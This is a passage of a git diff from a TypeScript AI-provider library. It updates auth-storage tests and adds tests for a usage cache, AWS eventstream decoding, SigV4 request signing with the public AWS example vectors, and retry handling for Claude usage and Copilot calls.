empty→non-empty transition", async () => { - const authStorage = await openStorage(); + const authStorage = openStorage(); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - await authStorage.getApiKey("anthropic", "session-pre-subscribe"); + disableCredential(authStorage, 1); const replayed: CredentialDisabledEvent[] = []; authStorage.onCredentialDisabled(event => { @@ -300,11 +361,10 @@ describe("AuthStorage credential_disabled subscriptions", () => { }); test("drains once: a later subscriber attached after the first does not re-receive past events", async () => { - const authStorage = await openStorage(); + const authStorage = openStorage(); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - await authStorage.getApiKey("anthropic", "session-pre-first-listener"); + disableCredential(authStorage, 1); const firstEvents: CredentialDisabledEvent[] = []; authStorage.onCredentialDisabled(event => { @@ -323,21 +383,20 @@ describe("AuthStorage credential_disabled subscriptions", () => { }); test("after every subscriber unsubscribes, subsequent events buffer until the next subscribe", async () => { - const authStorage = await openStorage(); + const authStorage = openStorage(); const events: CredentialDisabledEvent[] = []; const unsubscribe = authStorage.onCredentialDisabled(event => { events.push(event); }); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - await authStorage.getApiKey("anthropic", "session-pre-unsubscribe"); + disableCredential(authStorage, 1); expect(events).toHaveLength(1); unsubscribe(); // No subscribers; the next disable goes to the buffer. await authStorage.set("openai", [expiredOAuth()]); - await authStorage.getApiKey("openai", "session-during-gap"); + disableCredential(authStorage, 2, "openai"); expect(events).toHaveLength(1); const replayed: CredentialDisabledEvent[] = []; diff --git a/packages/ai/test/auth-storage-email-dedupe.test.ts b/packages/ai/test/auth-storage-email-dedupe.test.ts index e0cd8ccf7..434d703aa 100644 --- a/packages/ai/test/auth-storage-email-dedupe.test.ts +++ b/packages/ai/test/auth-storage-email-dedupe.test.ts @@ -3,7 +3,7 @@ import { afterEach, beforeEach, describe, expect, it } from "bun:test"; import * as fs from "node:fs/promises"; import * as os from "node:os"; import * as path from "node:path"; -import { AuthCredentialStore, AuthStorage, type OAuthCredential } from "../src/auth-storage"; +import { AuthStorage, type OAuthCredential, SqliteAuthCredentialStore } from "../src/auth-storage"; const LEGACY_TIMESTAMP = 1_700_000_000; @@ -105,13 +105,13 @@ function readTableSql(dbPath: string, tableName: string): string | null { describe("AuthStorage openai-codex email dedupe", () => { let tempDir = ""; let dbPath = ""; - let store: AuthCredentialStore | null = null; + let store: SqliteAuthCredentialStore | null = null; let authStorage: AuthStorage | null = null; beforeEach(async () => { tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "pi-ai-auth-email-dedupe-")); dbPath = path.join(tempDir, "agent.db"); - store = await AuthCredentialStore.open(dbPath); + store = await SqliteAuthCredentialStore.open(dbPath); authStorage = new AuthStorage(store); }); @@ -255,8 +255,8 @@ describe("AuthStorage openai-codex email dedupe", () => { it("saveOAuth does not delete accounts missing from stale AuthStorage cache", async () => { if (!store || !dbPath) throw new Error("test setup failed"); - const staleStore = await AuthCredentialStore.open(dbPath); - const freshStore = await AuthCredentialStore.open(dbPath); + const staleStore = await SqliteAuthCredentialStore.open(dbPath); + const freshStore = await SqliteAuthCredentialStore.open(dbPath); const staleAuthStorage = new AuthStorage(staleStore); try { staleStore.saveOAuth( @@ -396,7 +396,7 @@ describe("AuthStorage openai-codex email dedupe", () => { ); legacyDb.close(); - const migratedStore = await AuthCredentialStore.open(legacyDbPath); + const migratedStore = await SqliteAuthCredentialStore.open(legacyDbPath); try { expect(readStoredIdentityRows(legacyDbPath, "anthropic")).toEqual([ { identity_key: "email:legacy-anthropic@example.com", disabled_cause: null }, @@ -427,7 +427,7 @@ describe("AuthStorage openai-codex email dedupe", () => { if (!tempDir) throw new Error("test setup failed"); const freshDbPath = path.join(tempDir, "fresh-schema-agent.db"); - const freshStore = await AuthCredentialStore.open(freshDbPath); + const freshStore = await SqliteAuthCredentialStore.open(freshDbPath); try { expect(readAuthSchemaVersion(freshDbPath)).toBe(4); expect(readTableSql(freshDbPath, "auth_credentials")).not.toContain("unixepoch("); @@ -461,7 +461,7 @@ describe("AuthStorage openai-codex email dedupe", () => { `); futureDb.close(); - const reopenedStore = await AuthCredentialStore.open(futureDbPath); + const reopenedStore = await SqliteAuthCredentialStore.open(futureDbPath); try { expect(readAuthSchemaVersion(futureDbPath)).toBe(5); } finally { @@ -512,7 +512,7 @@ describe("AuthStorage openai-codex email dedupe", () => { ); legacyDb.close(); - const migratedStore = await AuthCredentialStore.open(legacyDbPath); + const migratedStore = await SqliteAuthCredentialStore.open(legacyDbPath); try { expect(readAuthSchemaVersion(legacyDbPath)).toBe(4); expect(readTableSql(legacyDbPath, "auth_credentials")).not.toContain("unixepoch("); @@ -566,7 +566,7 @@ describe("AuthStorage openai-codex email dedupe", () => { ); legacyDb.close(); - const migratedStore = await AuthCredentialStore.open(legacyDbPath); + const migratedStore = await SqliteAuthCredentialStore.open(legacyDbPath); try { expect(readStoredIdentityRows(legacyDbPath, "openai-codex")).toEqual([ { identity_key: "email:legacy-v1@example.com", disabled_cause: null }, @@ -608,7 +608,7 @@ describe("AuthStorage openai-codex email dedupe", () => { ); legacyDb.close(); - const migratedStore = await AuthCredentialStore.open(legacyDbPath); + const migratedStore = await SqliteAuthCredentialStore.open(legacyDbPath); try { expect(migratedStore.listAuthCredentials("openai-codex")).toHaveLength(0); expect(readStoredIdentityRows(legacyDbPath, "openai-codex")).toEqual([ diff --git a/packages/ai/test/auth-storage-oauth-refresh-race.test.ts b/packages/ai/test/auth-storage-oauth-refresh-race.test.ts index 78eae8a55..59864f631 100644 --- a/packages/ai/test/auth-storage-oauth-refresh-race.test.ts +++ b/packages/ai/test/auth-storage-oauth-refresh-race.test.ts @@ -2,7 +2,12 @@ import { afterEach, beforeEach, describe, expect, test, vi } from "bun:test"; import * as fs from "node:fs/promises"; import * as os from "node:os"; import * as path from "node:path"; -import { AuthCredentialStore, AuthStorage, type CredentialDisabledEvent } from "../src/auth-storage"; +import { + type AuthCredentialStore, + AuthStorage, + type CredentialDisabledEvent, + SqliteAuthCredentialStore, +} from "../src/auth-storage"; import * as oauthUtils from "../src/utils/oauth"; import { withEnv } from "./helpers"; @@ -19,7 +24,7 @@ describe("AuthStorage OAuth refresh race", () => { beforeEach(async () => { tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "pi-ai-auth-oauth-race-")); - store = await AuthCredentialStore.open(path.join(tempDir, "agent.db")); + store = await SqliteAuthCredentialStore.open(path.join(tempDir, "agent.db")); events = []; authStorage = new AuthStorage(store, { onCredentialDisabled: event => { diff --git a/packages/ai/test/auth-storage-usage-cache.test.ts b/packages/ai/test/auth-storage-usage-cache.test.ts new file mode 100644 index 000000000..b57d28484 --- /dev/null +++ b/packages/ai/test/auth-storage-usage-cache.test.ts @@ -0,0 +1,274 @@ +/** + * Tests for the new usage-cache contracts introduced after the broker + * migration surfaced Anthropic per-IP rate limits: + * + * 1. Per-credential cache stores the last successful report; failures + * DON'T overwrite a stale-but-good entry with null. + * 2. With a stale-but-good entry, a failure serves the previous value + * (cached for a short cool-down) instead of dropping the credential + * from the report. + * 3. Without a previous value, a failure returns null and DOES NOT cache — + * the next poll retries on the next request. + */ +import { afterEach, beforeEach, describe, expect, it, vi } from "bun:test"; +import { + type AuthCredential, + type AuthCredentialStore, + AuthStorage, + type StoredAuthCredential, +} from "../src/auth-storage"; +import type { UsageReport } from "../src/usage"; +import * as claudeUsage from "../src/usage/claude"; + +function anthropicReports(reports: UsageReport[] | null): UsageReport[] { + return (reports ?? []).filter(r => r.provider === "anthropic"); +} + +/** + * Force every cache entry to look stale to AuthStorage WITHOUT dropping the + * value. The cache layer is two-tier: the store-level `expiresAtSec` controls + * whether `getCache` returns anything at all, and the JSON payload's own + * `expiresAt` is what AuthStorage compares against `Date.now()` to decide if + * the entry is fresh. Mutating only the inner expiresAt simulates time + * passing while keeping the last-good value reachable for the failure path. + */ +function expireCachePayloads(store: ObservableStore): void { + for (const [key, entry] of store.cache) { + try { + const parsed = JSON.parse(entry.value); + parsed.expiresAt = 1; // positive but already in the past (epoch ms) + store.cache.set(key, { value: JSON.stringify(parsed), expiresAtSec: entry.expiresAtSec }); + } catch { + // Non-JSON entries — leave alone. + } + } +} + +interface CacheEntry { + value: string; + expiresAtSec: number; +} + +interface ObservableStore extends AuthCredentialStore { + cache: Map<string, CacheEntry>; +} + +/** + * Minimal in-memory `AuthCredentialStore` exposing the cache so we can + * assert what AuthStorage writes to it during usage fetches. + */ +function makeStore(rows: StoredAuthCredential[]): ObservableStore { + const cache = new Map<string, CacheEntry>(); + return { + cache, + close() {}, + listAuthCredentials() { + return rows; + }, + updateAuthCredential() {}, + deleteAuthCredential() {}, + tryDisableAuthCredentialIfMatches() { + return false; + }, + replaceAuthCredentialsForProvider() { + return rows; + }, + upsertAuthCredentialForProvider() { + return rows; + }, + deleteAuthCredentialsForProvider() {}, + getCache(key) { + const entry = cache.get(key); + if (!entry) return null; + if (entry.expiresAtSec * 1000 <= Date.now()) return null; + return entry.value; + }, + setCache(key, value, expiresAtSec) { + cache.set(key, { value, expiresAtSec }); + }, + cleanExpiredCache() {}, + }; +} + +function oauthRow(id: number, email: string): StoredAuthCredential { + const credential: AuthCredential = { + type: "oauth", + access: `oat-${id}`, + refresh: `refresh-${id}`, + expires: Date.now() + 3_600_000, + accountId: `account-${id}`, + email, + }; + return { id, provider: "anthropic", credential, disabledCause: null }; +} + +function makeReport(account: string): UsageReport { + return { + provider: "anthropic", + fetchedAt: Date.now(), + limits: [ + { + id: "anthropic:5h", + label: "5 Hour", + scope: { provider: "anthropic", windowId: "5h" }, + window: { id: "5h", label: "5 Hour" }, + amount: { used: 42, limit: 100, unit: "percent" }, + status: "ok", + }, + ], + metadata: { email: account, accountId: `account-${account}` }, + }; +} + +describe("AuthStorage usage cache: last-good failure fallback", () => { + let store: ObservableStore; + let storage: AuthStorage; + + beforeEach(async () => { + store = makeStore([oauthRow(1, "a@example.com")]); + // Restrict the resolver to anthropic. Without this, AuthStorage enumerates + // every default provider and — for any provider whose `supports()` accepts + // the matching `*_API_KEY` env var present on the test host — fans out a + // real network fetch per poll. 3 polls × N real fetches blows past the 5s + // test budget intermittently. + storage = new AuthStorage(store, { + usageProviderResolver: provider => (provider === "anthropic" ? claudeUsage.claudeUsageProvider : undefined), + }); + await storage.reload(); + }); + + afterEach(() => { + storage.close(); + vi.restoreAllMocks(); + }); + + it("caches a successful report and replays it on a second poll", async () => { + let calls = 0; + const goldReport = makeReport("a@example.com"); + vi.spyOn(claudeUsage.claudeUsageProvider, "fetchUsage").mockImplementation(async () => { + calls += 1; + return goldReport; + }); + + const first = anthropicReports(await storage.fetchUsageReports()); + expect(first).toHaveLength(1); + expect(calls).toBe(1); + + const second = anthropicReports(await storage.fetchUsageReports()); + expect(second).toHaveLength(1); + // Cache hit — provider was NOT called a second time. + expect(calls).toBe(1); + }); + + it("does NOT cache a failure when no previous good value exists — retries next poll", async () => { + let calls = 0; + vi.spyOn(claudeUsage.claudeUsageProvider, "fetchUsage").mockImplementation(async () => { + calls += 1; + return null; + }); + + const first = anthropicReports(await storage.fetchUsageReports()); + expect(first).toHaveLength(0); + expect(calls).toBe(1); + + const second = anthropicReports(await storage.fetchUsageReports()); + // No previous value → no cache write → retry on next poll. + expect(calls).toBe(2); + expect(second).toHaveLength(0); + }); + + it("serves last-good value through a failure cycle", async () => { + let calls = 0; + const goldReport = makeReport("a@example.com"); + vi.spyOn(claudeUsage.claudeUsageProvider, "fetchUsage").mockImplementation(async () => { + calls += 1; + if (calls === 1) return goldReport; + return null; + }); + + // First poll: real fetch → cached. + const first = anthropicReports(await storage.fetchUsageReports()); + expect(first).toHaveLength(1); + expect(calls).toBe(1); + + // Force every cached entry to expire so the next poll refetches. + // Bun's `bun:test` doesn't ship setSystemTime, so we manipulate the + // observable store cache directly — equivalent to advancing time past + // the success TTL. + expireCachePayloads(store); + + // Second poll: cache expired → refetch → provider returns null → + // AuthStorage falls back to last-good and the report stays populated. + const second = anthropicReports(await storage.fetchUsageReports()); + expect(calls).toBe(2); + expect(second).toHaveLength(1); + // The fallback value must be the SAME report (not a synthetic empty one). + expect(second?.[0]?.limits[0]?.amount.used).toBe(42); + }); + + it("re-attempts the failing credential after the cool-down expires", async () => { + let calls = 0; + const goldReport = makeReport("a@example.com"); + vi.spyOn(claudeUsage.claudeUsageProvider, "fetchUsage").mockImplementation(async () => { + calls += 1; + // Succeed on attempt 1, fail on 2, succeed on 3. + if (calls === 2) return null; + return goldReport; + }); + + const first = anthropicReports(await storage.fetchUsageReports()); + expect(first).toHaveLength(1); + expect(calls).toBe(1); + + // Expire success cache → poll 2 fetches and 429s → cool-down written. + expireCachePayloads(store); + const second = anthropicReports(await storage.fetchUsageReports()); + expect(second).toHaveLength(1); // last-good fallback + expect(calls).toBe(2); + + // Expire the cool-down → poll 3 refetches → success. + expireCachePayloads(store); + const third = anthropicReports(await storage.fetchUsageReports()); + expect(third).toHaveLength(1); + expect(calls).toBe(3); + }); +}); + +describe("AuthStorage usage cache: jitter", () => { + it("writes per-credential cache TTLs with ±25% jitter so refreshes decorrelate", async () => { + const store = makeStore([oauthRow(1, "a@example.com"), oauthRow(2, "b@example.com")]); + const storage = new AuthStorage(store, { + usageProviderResolver: provider => (provider === "anthropic" ? claudeUsage.claudeUsageProvider : undefined), + }); + await storage.reload(); + try { + const goldA = makeReport("a@example.com"); + const goldB = makeReport("b@example.com"); + vi.spyOn(claudeUsage.claudeUsageProvider, "fetchUsage").mockImplementation(async params => { + return params.credential.email === "a@example.com" ? goldA : goldB; + }); + + await storage.fetchUsageReports(); + + // The store-level TTL is bumped to the 24h durable-retention floor so + // `getStale` can recover last-good values; the freshness TTL we actually + // jitter lives in the JSON payload. Read that, not the store TTL. + const freshExpiries: number[] = []; + for (const entry of store.cache.values()) { + if (entry.value.length === 0) continue; + const parsed = JSON.parse(entry.value); + if (typeof parsed?.expiresAt === "number") freshExpiries.push(parsed.expiresAt); + } + expect(freshExpiries.length).toBeGreaterThanOrEqual(2); + const now = Date.now(); + for (const expiry of freshExpiries) { + const delta = expiry - now; + expect(delta).toBeGreaterThan(3.5 * 60_000); + expect(delta).toBeLessThan(6.5 * 60_000); + } + } finally { + storage.close(); + vi.restoreAllMocks(); + } + }); +}); diff --git a/packages/ai/test/aws-eventstream.test.ts b/packages/ai/test/aws-eventstream.test.ts new file mode 100644 index 000000000..347660ca1 --- /dev/null +++ b/packages/ai/test/aws-eventstream.test.ts @@ -0,0 +1,159 @@ +import { describe, expect, test } from "bun:test"; +import { crc32, decodeEventStream, decodeMessage } from "../src/providers/aws-eventstream"; + +// ---- Frame builder (mirrors @smithy/eventstream-codec but in-process so the +// test owns the bytes). The decoder is the production code; we encode here for +// fixture generation only. + +function encodeStringHeader(name: string, value: string): Uint8Array { + const nameBytes = new TextEncoder().encode(name); + const valueBytes = new TextEncoder().encode(value); + if (nameBytes.length > 255) throw new Error("name too long"); + const buf = new Uint8Array(1 + nameBytes.length + 1 + 2 + valueBytes.length); + const view = new DataView(buf.buffer); + let p = 0; + view.setUint8(p, nameBytes.length); + p += 1; + buf.set(nameBytes, p); + p += nameBytes.length; + view.setUint8(p, 7); // string type + p += 1; + view.setUint16(p, valueBytes.length, false); + p += 2; + buf.set(valueBytes, p); + return buf; +} + +function encodeFrame(headers: Record<string, string>, payload: Uint8Array): Uint8Array { + const headerChunks: Uint8Array[] = []; + for (const name in headers) headerChunks.push(encodeStringHeader(name, headers[name])); + const headerLen = headerChunks.reduce((s, c) => s + c.length, 0); + const headerBytes = new Uint8Array(headerLen); + let off = 0; + for (const c of headerChunks) { + headerBytes.set(c, off); + off += c.length; + } + const total = 4 + 4 + 4 + headerLen + payload.length + 4; + const out = new Uint8Array(total); + const view = new DataView(out.buffer); + view.setUint32(0, total, false); + view.setUint32(4, headerLen, false); + const preludeCrc = crc32(out.subarray(0, 8)); + view.setUint32(8, preludeCrc, false); + out.set(headerBytes, 12); + out.set(payload, 12 + headerLen); + const msgCrc = crc32(out.subarray(0, total - 4)); + view.setUint32(total - 4, msgCrc, false); + return out; +} + +function streamFrom(chunks: Uint8Array[]): ReadableStream<Uint8Array> { + let i = 0; + return new ReadableStream({ + pull(controller) { + if (i < chunks.length) controller.enqueue(chunks[i++]); + else controller.close(); + }, + }); +} + +async function collect( + stream: ReadableStream<Uint8Array>, +): Promise<Array<{ headers: Record<string, string>; text: string }>> { + const out: Array<{ headers: Record<string, string>; text: string }> = []; + for await (const msg of decodeEventStream(stream)) { + out.push({ headers: msg.headers, text: new TextDecoder().decode(msg.payload) }); + } + return out; +} + +describe("aws-eventstream", () => { + test("CRC32 matches known vectors", () => { + // Standard CRC32 of "123456789" = 0xCBF43926 (zlib/IEEE). + const bytes = new TextEncoder().encode("123456789"); + expect(crc32(bytes)).toBe(0xcbf43926); + expect(crc32(new Uint8Array(0))).toBe(0); + }); + + test("decodes a single full-message frame", async () => { + const payload = new TextEncoder().encode('{"messageStart":{"role":"assistant"}}'); + const frame = encodeFrame( + { ":message-type": "event", ":event-type": "messageStart", ":content-type": "application/json" }, + payload, + ); + const decoded = decodeMessage(frame); + expect(decoded.headers[":event-type"]).toBe("messageStart"); + expect(new TextDecoder().decode(decoded.payload)).toBe('{"messageStart":{"role":"assistant"}}'); + + const collected = await collect(streamFrom([frame])); + expect(collected).toHaveLength(1); + expect(collected[0].headers[":message-type"]).toBe("event"); + }); + + test("stitches a frame split across two chunks", async () => { + const payload = new TextEncoder().encode('{"contentBlockDelta":{"delta":{"text":"hi"}}}'); + const frame = encodeFrame({ ":message-type": "event", ":event-type": "contentBlockDelta" }, payload); + const mid = Math.floor(frame.length / 2); + const chunks = [frame.subarray(0, mid), frame.subarray(mid)]; + const collected = await collect(streamFrom(chunks.map(c => new Uint8Array(c)))); + expect(collected).toHaveLength(1); + expect(collected[0].headers[":event-type"]).toBe("contentBlockDelta"); + expect(collected[0].text).toContain('"hi"'); + }); + + test("decodes multiple messages packed into one chunk", async () => { + const a = encodeFrame( + { ":message-type": "event", ":event-type": "messageStart" }, + new TextEncoder().encode('{"role":"assistant"}'), + ); + const b = encodeFrame( + { ":message-type": "event", ":event-type": "contentBlockDelta" }, + new TextEncoder().encode('{"x":1}'), + ); + const c = encodeFrame( + { ":message-type": "event", ":event-type": "messageStop" }, + new TextEncoder().encode('{"stopReason":"end_turn"}'), + ); + const merged = new Uint8Array(a.length + b.length + c.length); + merged.set(a, 0); + merged.set(b, a.length); + merged.set(c, a.length + b.length); + + const collected = await collect(streamFrom([merged])); + expect(collected.map(x => x.headers[":event-type"])).toEqual([ + "messageStart", + "contentBlockDelta", + "messageStop", + ]); + }); + + test("surfaces exception event headers and payload", async () => { + const payload = new TextEncoder().encode('{"message":"input too long"}'); + const frame = encodeFrame( + { + ":message-type": "exception", + ":exception-type": "validationException", + ":content-type": "application/json", + }, + payload, + ); + const collected = await collect(streamFrom([frame])); + expect(collected).toHaveLength(1); + expect(collected[0].headers[":message-type"]).toBe("exception"); + expect(collected[0].headers[":exception-type"]).toBe("validationException"); + expect(collected[0].text).toContain("input too long"); + }); + + test("throws on prelude CRC mismatch", () => { + const frame = encodeFrame({ ":event-type": "x" }, new Uint8Array(0)); + frame[8] ^= 0xff; // flip a byte in the prelude CRC + expect(() => decodeMessage(frame)).toThrow(/prelude CRC/); + }); + + test("throws on message CRC mismatch", () => { + const frame = encodeFrame({ ":event-type": "x" }, new TextEncoder().encode("{}")); + frame[frame.length - 1] ^= 0xff; + expect(() => decodeMessage(frame)).toThrow(/message CRC/); + }); +}); diff --git a/packages/ai/test/aws-sigv4.test.ts b/packages/ai/test/aws-sigv4.test.ts new file mode 100644 index 000000000..bcb661f19 --- /dev/null +++ b/packages/ai/test/aws-sigv4.test.ts @@ -0,0 +1,96 @@ +import { describe, expect, test } from "bun:test"; +import { formatAmzDate, getSigningKey, signRequest, toHex } from "../src/providers/aws-sigv4"; + +// Canonical AWS SigV4 test vectors. Sourced from the +// `aws-sig-v4-test-suite` published with the SigV4 spec. +// +// We hit the two most common shapes: a GET with no body and a POST with a JSON +// body. Each vector pins the expected signature so any drift in canonicalization +// is caught. + +const CREDS = { + accessKeyId: "AKIDEXAMPLE", + secretAccessKey: "wJalrXUtnFEMI/K7MDENG+bPxRfiCYEXAMPLEKEY", +}; +const REGION = "us-east-1"; +const SERVICE = "service"; +// 2015-08-30T12:36:00Z -> longDate 20150830T123600Z, shortDate 20150830. +const DATE = new Date("2015-08-30T12:36:00Z"); + +describe("aws-sigv4 helpers", () => { + test("formatAmzDate", () => { + expect(formatAmzDate(DATE)).toEqual({ longDate: "20150830T123600Z", shortDate: "20150830" }); + }); + + test("derived signing key matches spec sample", async () => { + // Reference value from AWS docs: + // https://docs.aws.amazon.com/IAM/latest/UserGuide/signature-v4-examples.html + const key = await getSigningKey(CREDS.secretAccessKey, "20150830", REGION, "iam"); + expect(toHex(key)).toBe("c4afb1cc5771d871763a393e44b703571b55cc28424d1a5e86da6ed3c154a4b9"); + }); +}); + +describe("aws-sigv4 signRequest", () => { + test("GET with empty body matches @smithy/signature-v4 reference", async () => { + // Reference signatures cross-verified once against `@smithy/signature-v4` + // (with `@aws-crypto/sha256-js` as the hash) signing the same request + // with identical credentials/date/region/service. Pinned here so the test + // runs without those SDK deps. + const signed = await signRequest({ + method: "GET", + host: "example.amazonaws.com", + path: "/", + body: new Uint8Array(0), + region: REGION, + service: SERVICE, + credentials: CREDS, + date: DATE, + }); + expect(signed["x-amz-date"]).toBe("20150830T123600Z"); + // SHA-256("") = e3b0c44... + expect(signed["x-amz-content-sha256"]).toBe("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"); + expect(signed.authorization).toBe( + "AWS4-HMAC-SHA256 Credential=AKIDEXAMPLE/20150830/us-east-1/service/aws4_request, " + + "SignedHeaders=host;x-amz-content-sha256;x-amz-date, " + + "Signature=726c5c4879a6b4ccbbd3b24edbd6b8826d34f87450fbbf4e85546fc7ba9c1642", + ); + }); + + test("POST with JSON body matches @smithy/signature-v4 reference", async () => { + const body = new TextEncoder().encode('{"hello":"world"}'); + const signed = await signRequest({ + method: "POST", + host: "example.amazonaws.com", + path: "/", + body, + region: REGION, + service: SERVICE, + credentials: CREDS, + date: DATE, + headers: { "content-type": "application/json" }, + }); + // SHA-256('{"hello":"world"}') = 93a23971a914e5eacbf0a8d25154cda... + expect(signed["x-amz-content-sha256"]).toBe("93a23971a914e5eacbf0a8d25154cda309c3c1c72fbb9914d47c60f3cb681588"); + expect(signed.authorization).toBe( + "AWS4-HMAC-SHA256 Credential=AKIDEXAMPLE/20150830/us-east-1/service/aws4_request, " + + "SignedHeaders=content-type;host;x-amz-content-sha256;x-amz-date, " + + "Signature=e9744044f72be2a6e5082cdcebb673e0a1daf890c82cc130d46abd3769ca15e0", + ); + }); + + test("session token is included when credentials carry one", async () => { + const signed = await signRequest({ + method: "GET", + host: "example.amazonaws.com", + path: "/", + body: new Uint8Array(0), + region: REGION, + service: SERVICE, + credentials: { ...CREDS, sessionToken: "AQoDYXdzEJr..." }, + date: DATE, + }); + expect(signed["x-amz-security-token"]).toBe("AQoDYXdzEJr..."); + // Token must appear in SignedHeaders too (it's signed). + expect(signed.authorization).toContain("x-amz-security-token"); + }); +}); diff --git a/packages/ai/test/claude-usage-retry.test.ts b/packages/ai/test/claude-usage-retry.test.ts new file mode 100644 index 000000000..91c11141f --- /dev/null +++ b/packages/ai/test/claude-usage-retry.test.ts @@ -0,0 +1,182 @@ +import { afterEach, describe, expect, it, vi } from "bun:test"; +import type { UsageFetchContext } from "../src/usage"; +import { claudeUsageProvider } from "../src/usage/claude"; + +const VALID_PAYLOAD = { + five_hour: { utilization: 42, resets_at: new Date(Date.now() + 5 * 60_000).toISOString() }, +}; + +function jsonResponse(status: number, body: unknown, headers: Record<string, string> = {}): Response { + return new Response(JSON.stringify(body), { + status, + headers: { "Content-Type": "application/json", ...headers }, + }); +} + +function makeContext(fetchImpl: typeof fetch, retryWait?: UsageFetchContext["retryWait"]): UsageFetchContext { + return { fetch: fetchImpl, retryWait }; +} + +function baseParams() { + return { + provider: "anthropic" as const, + credential: { + type: "oauth" as const, + accessToken: "oat-test", + accountId: "org_test", + email: "user@example.com", + expiresAt: Date.now() + 60_000, + }, + }; +} + +describe("claudeUsageProvider retry contract", () => { + afterEach(() => { + vi.restoreAllMocks(); + }); + + const instantRetryWait: UsageFetchContext["retryWait"] = async () => {}; + + it("retries on 429 and succeeds on a later attempt", async () => { + let attempt = 0; + const fetchMock = (async () => { + attempt += 1; + if (attempt < 3) return jsonResponse(429, { error: "rate_limited" }); + return jsonResponse(200, VALID_PAYLOAD); + }) as unknown as typeof fetch; + + const report = await claudeUsageProvider.fetchUsage(baseParams(), makeContext(fetchMock, instantRetryWait)); + expect(report).not.toBeNull(); + expect(attempt).toBe(3); + expect(report?.limits[0]?.amount.used).toBe(42); + }); + + it("retries on 503 then succeeds", async () => { + let attempt = 0; + const fetchMock = (async () => { + attempt += 1; + if (attempt === 1) return jsonResponse(503, { error: "unavailable" }); + return jsonResponse(200, VALID_PAYLOAD); + }) as unknown as typeof fetch; + + const report = await claudeUsageProvider.fetchUsage(baseParams(), makeContext(fetchMock, instantRetryWait)); + expect(report).not.toBeNull(); + expect(attempt).toBe(2); + }); + + it("does NOT retry on 401 — permanent for this credential", async () => { + let attempt = 0; + const fetchMock = (async () => { + attempt += 1; + return jsonResponse(401, { error: "unauthorized" }); + }) as unknown as typeof fetch; + + const report = await claudeUsageProvider.fetchUsage(baseParams(), makeContext(fetchMock)); + expect(report).toBeNull(); + expect(attempt).toBe(1); + }); + + it("does NOT retry on 404 — permanent for this credential", async () => { + let attempt = 0; + const fetchMock = (async () => { + attempt += 1; + return jsonResponse(404, { error: "not_found" }); + }) as unknown as typeof fetch; + + const report = await claudeUsageProvider.fetchUsage(baseParams(), makeContext(fetchMock)); + expect(report).toBeNull(); + expect(attempt).toBe(1); + }); + + it("returns null after MAX_RETRIES of consecutive 429s", async () => { + let attempt = 0; + const fetchMock = (async () => { + attempt += 1; + return jsonResponse(429, { error: "rate_limited" }); + }) as unknown as typeof fetch; + + const report = await claudeUsageProvider.fetchUsage(baseParams(), makeContext(fetchMock, instantRetryWait)); + expect(report).toBeNull(); + expect(attempt).toBe(3); + }); + + it("honours Retry-After when retrying a 429", async () => { + let attempt = 0; + const retryWait = vi.fn(async (_delayMs: number, _signal?: AbortSignal) => {}); + const fetchMock = (async () => { + attempt += 1; + if (attempt === 1) { + // Retry-After: 1 second. Provider must compute a 1s backoff before re-attempting. + return jsonResponse(429, { error: "rate_limited" }, { "retry-after": "1" }); + } + return jsonResponse(200, VALID_PAYLOAD); + }) as unknown as typeof fetch; + + const report = await claudeUsageProvider.fetchUsage(baseParams(), makeContext(fetchMock, retryWait)); + expect(report).not.toBeNull(); + expect(attempt).toBe(2); + expect(retryWait).toHaveBeenCalledTimes(1); + expect(retryWait.mock.calls[0]?.[0]).toBe(1000); + }); + + it("aborts the retry sleep when the signal fires mid-backoff", async () => { + let attempt = 0; + const fetchMock = (async (_url: string | URL, init?: RequestInit) => { + attempt += 1; + if (init?.signal?.aborted) throw new Error("AbortError"); + if (attempt === 1) { + // Pretend Anthropic wants us to back off for 60s. Without + // `scheduler.wait({ signal })` the provider would stall through + // the timeout; with it, the abort rejects the sleep promptly. + return jsonResponse(429, { error: "rate_limited" }, { "retry-after": "60" }); + } + return jsonResponse(200, VALID_PAYLOAD); + }) as unknown as typeof fetch; + + const controller = new AbortController(); + const retryWait = vi.fn(async (delayMs: number, signal?: AbortSignal) => { + expect(delayMs).toBe(60_000); + if (signal?.aborted) throw new Error("AbortError"); + const { promise, reject } = Promise.withResolvers<void>(); + const onAbort = () => reject(new Error("AbortError")); + signal?.addEventListener("abort", onAbort, { once: true }); + queueMicrotask(() => controller.abort()); + try { + await promise; + } finally { + signal?.removeEventListener("abort", onAbort); + } + }); + + const report = await claudeUsageProvider.fetchUsage( + { ...baseParams(), signal: controller.signal }, + makeContext(fetchMock, retryWait), + ); + expect(report).toBeNull(); + expect(retryWait).toHaveBeenCalledTimes(1); + expect(attempt).toBe(1); + }); + + it("falls back to lastPayload when retries exhausted with stale-but-valid data", async () => { + // Provider keeps lastPayload across attempts — if the upstream returns + // a 200 with a recognized shape but no usage data, we keep iterating. + // If we then 429 forever, we return what we have (null in this case). + let attempt = 0; + const fetchMock = (async () => { + attempt += 1; + if (attempt === 1) { + // 200 OK but no usage payload — provider continues to next attempt + // (waiting for fresh data) rather than returning immediately. + return jsonResponse(200, {}); + } + return jsonResponse(429, { error: "rate_limited" }); + }) as unknown as typeof fetch; + + const report = await claudeUsageProvider.fetchUsage(baseParams(), makeContext(fetchMock, instantRetryWait)); + // The 200 set lastPayload but had no usage data; 429s mean no further + // successes. lastPayload survives but has no usage data → no limits. + // Specifically: report is null (since lastPayload has nothing to expose). + expect(report).toBeNull(); + expect(attempt).toBe(3); + }); +}); diff --git a/packages/ai/test/copilot-retry.test.ts b/packages/ai/test/copilot-retry.test.ts index 28881b14d..42ebd6319 100644 --- a/packages/ai/test/copilot-retry.test.ts +++ b/packages/ai/test/copilot-retry.test.ts @@ -83,7 +83,7 @@ describe("callWithCopilotModelRetry", () => { calls += 1; throw err; }, - { provider: "github-copilot" }, + { provider: "github-copilot", retryBaseDelayMs: 0 }, ), ).rejects.toBe(err); expect(calls).toBe(3); @@ -99,7 +99,7 @@ describe("callWithCopilotModelRetry", () => { } return "ok" as const; }, - { provider: "github-copilot" }, + { provider: "github-copilot", retryBaseDelayMs: 0 }, ); expect(result).toBe("ok"); expect(calls).toBe(2); @@ -130,7 +130,7 @@ 